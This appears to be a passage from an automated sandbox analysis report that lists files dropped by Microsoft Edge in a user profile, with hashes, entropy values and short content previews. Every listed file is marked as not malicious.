                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2e536.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\bbe3edb2-7722-4d0b-afa4-eba52d8e89da.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2683972043844856
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7pGvLZYebvqBZFUt8Ocb/+OcKz54ZYebvqBaJ:7pElYebvyg8OqdloYebvL
                                                                                                                                                                                                                                                                                          MD5:AFACF2A7F2891A867691F741D813F021
                                                                                                                                                                                                                                                                                          SHA1:DB0112057A904003D90C38A7A7D9404FDD7331CE
                                                                                                                                                                                                                                                                                          SHA-256:D5241F2808F1B7646E62824CD0CD37D3369094CD5476C7FD8AFEE1E977E0CBE2
                                                                                                                                                                                                                                                                                          SHA-512:C7CED641FBE4FE6A13A8E40DD687D9C43F621458D527A650FC031AEAD699258D2D9D452AB3E5CFBF810CF52F8DBE898D9F9DC3CE2CA46E52C6EF25979D1961C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:46:11.363 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-03:46:11.401 788 Recovering log #3.2024/12/19-03:46:11.404 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2683972043844856
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7pGvLZYebvqBZFUt8Ocb/+OcKz54ZYebvqBaJ:7pElYebvyg8OqdloYebvL
                                                                                                                                                                                                                                                                                          MD5:AFACF2A7F2891A867691F741D813F021
                                                                                                                                                                                                                                                                                          SHA1:DB0112057A904003D90C38A7A7D9404FDD7331CE
                                                                                                                                                                                                                                                                                          SHA-256:D5241F2808F1B7646E62824CD0CD37D3369094CD5476C7FD8AFEE1E977E0CBE2
                                                                                                                                                                                                                                                                                          SHA-512:C7CED641FBE4FE6A13A8E40DD687D9C43F621458D527A650FC031AEAD699258D2D9D452AB3E5CFBF810CF52F8DBE898D9F9DC3CE2CA46E52C6EF25979D1961C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:46:11.363 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-03:46:11.401 788 Recovering log #3.2024/12/19-03:46:11.404 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.253221825776364
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RJAVq2PcNwi23oH+TcwtpIFUt8O8RLYrAgZmw+O8RLYrAIkwOcNwi23oH+Tcwd:7kAVvLZYebmFUt8OEIAg/+OEIAI54ZYM
                                                                                                                                                                                                                                                                                          MD5:E5000FFF656EF41336300974B2816DAC
                                                                                                                                                                                                                                                                                          SHA1:761E53062912767BBCDFB7A6BE7E2BE3D46289EC
                                                                                                                                                                                                                                                                                          SHA-256:3BB43DFDA06350771A9C285ACED844F9C9DDC43904EF183F33ABDBE42C60B936
                                                                                                                                                                                                                                                                                          SHA-512:D438EE85B994FAE5A153C69D8BCC20CFB99D96D9C4E4C3A7C53087C2BC4DEA9AAD8DF27AD7FD2940D5BD1E3699C3FF4B7031E871AE63FEF74DB73D9507DB2573
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.823 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-03:45:52.824 12b4 Recovering log #3.2024/12/19-03:45:52.824 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.253221825776364
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RJAVq2PcNwi23oH+TcwtpIFUt8O8RLYrAgZmw+O8RLYrAIkwOcNwi23oH+Tcwd:7kAVvLZYebmFUt8OEIAg/+OEIAI54ZYM
                                                                                                                                                                                                                                                                                          MD5:E5000FFF656EF41336300974B2816DAC
                                                                                                                                                                                                                                                                                          SHA1:761E53062912767BBCDFB7A6BE7E2BE3D46289EC
                                                                                                                                                                                                                                                                                          SHA-256:3BB43DFDA06350771A9C285ACED844F9C9DDC43904EF183F33ABDBE42C60B936
                                                                                                                                                                                                                                                                                          SHA-512:D438EE85B994FAE5A153C69D8BCC20CFB99D96D9C4E4C3A7C53087C2BC4DEA9AAD8DF27AD7FD2940D5BD1E3699C3FF4B7031E871AE63FEF74DB73D9507DB2573
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.823 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-03:45:52.824 12b4 Recovering log #3.2024/12/19-03:45:52.824 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2651716274333387
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkMPSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JP9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                                                          MD5:6F09A60146E610ADC2B476E720AD813E
                                                                                                                                                                                                                                                                                          SHA1:9F436B059B4DA13F94996B64B7EB688C55BC792A
                                                                                                                                                                                                                                                                                          SHA-256:5BAB95E2F29E66C62D9254172AE0F5ED4AAC9C5C0134648992932FEBCC86BEE7
                                                                                                                                                                                                                                                                                          SHA-512:5F68D788E50EC9C7F588C3A2EAD97C8AB64EA1B0CAD1A51147651A02C608865B081F4584004C8FEAE37F06611E116C3690343BF74E1C92043420A0003BBA576D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46680835700587137
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0eEpI:v7doKsKuKZKlZNmu46yjx0e4I
                                                                                                                                                                                                                                                                                          MD5:469AE2D5E045423731E426D0C88A39DB
                                                                                                                                                                                                                                                                                          SHA1:5660B2AA5942996E7C4F392DBA59B1793995E000
                                                                                                                                                                                                                                                                                          SHA-256:F10A979A97B84F19A2359C1EF2E67C5108A250EEB2196E6C9898662645F8F4F8
                                                                                                                                                                                                                                                                                          SHA-512:0981A7F7EA517814C0F4A7CD999AEAEF4E7EE88371EAD4667E68A4813CC40B5D082A4203CC1F15CE8FAA6FB18B17CA26BA34C17BE57E323F14D23C914E005031
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):12824
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.13684917502873026
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:ztUlF9eLPle4puj3dndQlKtU+eQ8hllFsD:x8HkdbQtS2U+S/S
                                                                                                                                                                                                                                                                                          MD5:F49E059E085B65661A67C8EA4282FF0B
                                                                                                                                                                                                                                                                                          SHA1:D2095BAF4C4A4E409BAB45A6AD57EBBE96B7CE14
                                                                                                                                                                                                                                                                                          SHA-256:712F3D7306A465E5E5848112FB26026496108A257CE8474A36426467683904C5
                                                                                                                                                                                                                                                                                          SHA-512:220AA3A97F4C14D68E6C7FF1E11905A3734D0320B7C54A1CE7175D1EA10C2640D8AA8C78163174451E6D135C4E102F4FB8F1640ECF59689923AE6CAD577FC362
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.............M..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a41a31b7-fa47-4487-b4e6-92bb3e16d93d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17563), with no line terminators
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):17563
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4840886311982935
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1Li78dK8TbVS:stAPGQSu4UsyQtJxncOo70kbGZQwRrf
                                                                                                                                                                                                                                                                                          MD5:B695D8D6D9A65DFAD9D4A21AB8CC2C9E
                                                                                                                                                                                                                                                                                          SHA1:D46B402D942EF3ED01DE36E4E3B1D819644A9B24
                                                                                                                                                                                                                                                                                          SHA-256:5DBE95C18506C3427594EB77B8CC11296AAABCE16F662454CDFAF8B85099C902
                                                                                                                                                                                                                                                                                          SHA-512:A13ED60908A2C96D8BEAF077B18DF69E8BDF801B061D92E06099A3AFF31F9D5B28CA33D24025F8C5E01727081CC06258E7F7F6DF2C80738C95EEAAB763C7D8FD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bce08155-1dd9-4a56-99ea-4e327a411342.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c8d9689d-0597-4245-aa4d-5d8caf914840.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d8f2674a-ec39-41c2-ad9a-dea544540661.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
